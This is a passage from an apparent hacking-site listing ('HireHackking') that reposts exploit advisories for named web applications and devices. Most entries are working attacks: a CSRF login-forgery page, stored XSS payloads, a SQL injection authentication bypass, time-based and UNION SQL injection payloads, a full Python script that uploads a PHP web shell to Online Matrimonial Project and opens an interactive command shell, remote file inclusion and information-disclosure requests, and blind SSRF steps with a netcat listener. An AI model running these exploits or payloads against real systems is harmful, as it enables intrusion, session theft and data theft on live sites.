vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how Win32k handles objects in memory. [+] Disclaimer The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
  14. HireHackking

    User Registration & Login and User Management System 2.1 - Cross Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery # Exploit Author: Dipak Panchal(th3.d1p4k) # Vendor Homepage: https://phpgurukul.com # Software Link: http://user-registration-login-and-user-management-system-with-admin-panel # Version: 5 # Tested on Windows 10 Attack Vector: An attacker can craft HTML page containing POST information to have the victim sign into an attacker's account, where the victim can add information assuming he/she is logged into the correct account, where in reality, the victim is signed into the attacker's account where the changes are visible to the attacker. Exploit: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/loginsystem/" method="POST"> <input type="hidden" name="uemail" value="user1@mail.com" /> <input type="hidden" name="password" value="User@1234" /> <input type="hidden" name="login" value="LOG&#32;IN" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation: Please add a csrf token to login request or make some type prompt that the session has ended when the new login from attacker occurs.
  15. HireHackking

    Coastercms 5.8.18 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Coastercms 5.8.18 - Stored XSS # Exploit Author: Hardik Solanki # Vendor Homepage: https://www.coastercms.org/ # Software Link: https://www.coastercms.org/ # Version: 5.8.18 # Tested on Windows 10 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Edit Page tab Steps to reproduce: 1: Navigate to "http://localhost/admin/login" and log in with admin credentials. 2:- Then after login navigates to "Page --> Homepage --> Our Blog" and click on the edit page. 3: Then add the payload "<script>alert(123)</script>" & Payload "<h1>test</h1>", and cliock on update button. Saved succesfully. 4: Now, click on "View live page" and it will redirect you to the live page at "http://localhost/homepage/blog" and XSS will get stored and trigger on the main home page
  16. HireHackking

    EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass # Date: 02-12-2020 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: http://egavilanmedia.com # Software Link : http://egavilanmedia.com/egm-address-book/ # Version: 1.0 # Tested on: PopOS Attack Vector: An attacker can gain admin panel access using malicious sql injection queries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/Address%20Book/login.php 2. Now put below Payload in both the fields( User ID & Password) Payload: admin' or '1'='1 3. Server accepted our payload and we bypassed cpanel without any credentials
  17. HireHackking

    Online Matrimonial Project 1.0 - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution # Exploit Author: Valerio Alessandroni # Date: 2020-10-07 # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ # Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php # Version: 1.0 # Tested On: Server Linux Ubuntu 18.04, Apache2 # Version: Python 2.x # Impact: Code Execution # Affected components: Affected move_uploaded_file() function in functions.php file. # Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed. # # Additional information: # # To exploit this vulnerability: # 1) register a not privileged user at /register.php # 2) login in the application /login.php # 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID] # 4) go to the page /photouploader.php?id=[ID] # 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>" # 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php # 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND] # # How to use it: # python exploit.py [URL] [USERNAME] [PASSWORD] import requests, sys, urllib, re, time from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def webshell(SERVER_URL, ID, FILE_NAME): try: print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...') time.sleep(1) WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME getCMD = {'cmd': 'echo ciao'} r2 = requests.get(WEB_SHELL, params=getCMD) status = r2.status_code if status != 200: print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') while True: inputCMD = raw_input('$ ') command = {'cmd': inputCMD} r2 = requests.get(WEB_SHELL, params=command, verify=False) print r2.text except: print("\r\nExiting.") sys.exit(-1) def printHeader(): print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____") print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|") print(Fore.GREEN+"| . . | __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ") print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ") print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ") print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ") print '' if __name__ == "__main__": printHeader() if len(sys.argv) != 4: print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0]) print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] SERVER_URI = SERVER_URL + 'auth/auth.php' LOGIN_PARAMS = {'user': '1'} LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False) print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...') time.sleep(1) for resp in req.history: COOKIES = resp.cookies.get_dict() SPLITTED = resp.headers["location"].split("=") ID = SPLITTED[1] print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].') time.sleep(1) SERVER_URI = SERVER_URL + 'photouploader.php' LOGIN_PARAMS = {'id': ID} LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} FILE_NAME = 'shell.php' FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')} req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False) print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.') time.sleep(1) webshell(SERVER_URL, ID, FILE_NAME)
  18. HireHackking

    Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure # Date: 20.09.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro-bravia.sony.net # Version: 1.7.8 Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure Vendor: Sony Electronics Inc. Product web page: https://pro-bravia.sony.net https://pro-bravia.sony.net/resources/software/bravia-signage/ https://pro.sony/ue_US/products/display-software Affected version: <=1.7.8 Summary: Sony's BRAVIA Signage is an application to deliver video and still images to Pro BRAVIAs and manage the information via a network. Features include management of displays, power schedule management, content playlists, scheduled delivery management, content interrupt, and more. This cost-effective digital signage management solution is ideal for presenting attractive, informative visual content in retail spaces and hotel reception areas, visitor attractions, educational and corporate environments. Desc: The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. Tested on: Microsoft Windows Server 2012 R2 Ubuntu NodeJS Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5610 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php 20.09.2020 -- $ curl http://192.168.1.20:8080/api/system {"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}
  19. HireHackking

    Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion # Date: 20.09.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://pro-bravia.sony.net # Version: 1.7.8 Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion Vendor: Sony Electronics Inc. Product web page: https://pro-bravia.sony.net https://pro-bravia.sony.net/resources/software/bravia-signage/ https://pro.sony/ue_US/products/display-software Affected version: <=1.7.8 Summary: Sony's BRAVIA Signage is an application to deliver video and still images to Pro BRAVIAs and manage the information via a network. Features include management of displays, power schedule management, content playlists, scheduled delivery management, content interrupt, and more. This cost-effective digital signage management solution is ideal for presenting attractive, informative visual content in retail spaces and hotel reception areas, visitor attractions, educational and corporate environments. Desc: BRAVIA digital signage is vulnerable to a remote file inclusion (RFI) vulnerability by including arbitrary client-side dynamic scripts (JavaScript, VBScript, HTML) when adding content though the input URL material of type html. This allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display. Tested on: Microsoft Windows Server 2012 R2 Ubuntu NodeJS Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5612 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php 20.09.2020 -- Request: -------- POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1 Host: 192.168.1.20:8080 Proxy-Connection: keep-alive Content-Length: 468 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.1.20:8080 Referer: http://192.168.1.20:8080/test.txt Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: io=RslVZVH6Dc8WsOn5AAAJ {"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
  20. HireHackking

    mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting # Date: 3-12-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://mojoportal.com # Software Link: https://www.mojoportal.com/download # Version: 2.7.0.0 # Tested on: Windows 10/Kali Linux Attack vector: This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Edit Forum 'Title :'. Steps-To-Reproduce: 1. Login to the Admin Account 2. Go to the Forums. 3. click on Add Forum. 4. Add payload to Title: <script>alert(1)</script> 5. Click on Create New Forum. 6. As soon as admin or any visitor visit the forum the XSS payload will triage. Post Request - ''' POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756 Content-Type: application/x-www-form-urlencoded Content-Length: 5037 Origin: https://localhost Connection: close Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1 Upgrade-Insecure-Requests: 1 __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOeYVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7fSZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVRVX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums '''
  21. HireHackking

    Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting # Date: 02-12-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://invisioncommunity.com/ # Software Link: https://invisioncommunity.com/buy # Version: 4.5.4 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29477 Vulnerable Parameters: Profile - Field Name. Steps-To-Reproduce: 1. Go to the Invision Community admin page. 2. Now go to the Members - MEMBER SETTINGS - Profiles. 3. Now click on Add Profile field. 4. Put the below payload in Field Name: "<script>alert(123)</script>" 5. Now click on Save button. 6. The XSS will be triggered. POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 660 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: XYZ form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=
  22. HireHackking

    Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) # Date: 03/12/2020 # Exploit Author: Pankaj Verma (_p4nk4j) # Vendor Homepage: https://www.canto.com/integrations/wordpress/ # Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin # Version: 1.3.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978 Description:- The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities. It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter. Vulnerable Parameters and Endpoints:- https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain= https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain= https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain= Steps To Reproduce:- 1. Start a Netcat Listener on any port For e.g. 4499 2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain=" 3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. 4. Observe the response we got from the Target on Attacker's Listener. Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.
  23. HireHackking

    Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection # Date: 2020-12-04 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://github.com/geraked/phpscript-sgh # Software Link: https://github.com/geraked/phpscript-sgh # Version: 0.1.0 # Tested on: Kali Linux ------------------------------------------------------------------------------------------------------------------------ Source code(localhost/admin/admins.php): if ($_REQUEST['op']=='add') { $id = $username = $password = $conf_password = $firstname = $lastname = $email = $pic = $_SESSION['aapic'] = ""; } else { $result = $conn->query("SELECT * FROM sgh_admins WHERE id=".test_input($_REQUEST['id'])." LIMIT 1"); $row = $result->fetch_assoc(); extract($row); $_SESSION['aapic'] = $pic; } ------------------------------------------------------------------------------------------------------------------------ Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: op=edit&id=1 AND (SELECT 9367 FROM (SELECT(SLEEP(5)))pBEE)&_pjax=#pjax-container Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: op=edit&id=-5015 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b716271,0x536b4e4a775448674c73477175675a4c58476659474f524b535456706e7276474251424a4f67744b,0x717a626b71),NULL-- -&_pjax=#pjax-container ------------------------------------------------------------------------------------------------------------------------
  24. HireHackking

    IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: IDT PC Audio 1.0.6499.0 - 'STacSV' Unquoted Service Path # Discovery by: Diego Cañada # Software link: https://www.pconlife.com/download/otherfile/20566/90674cffc8658c4f2bf58d43bb9b7ccb/ # Discovery Date: 2020-12-03 # Tested Version: 1.0.6499.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Home Single Language x64 ES # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """ Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto # Service info: C:\>sc qc StacSV [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: StacSV TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe GRUPO_ORDEN_CARGA : AudioGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  25. HireHackking

    Composr CMS 10.0.34 - 'banners' Persistent Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
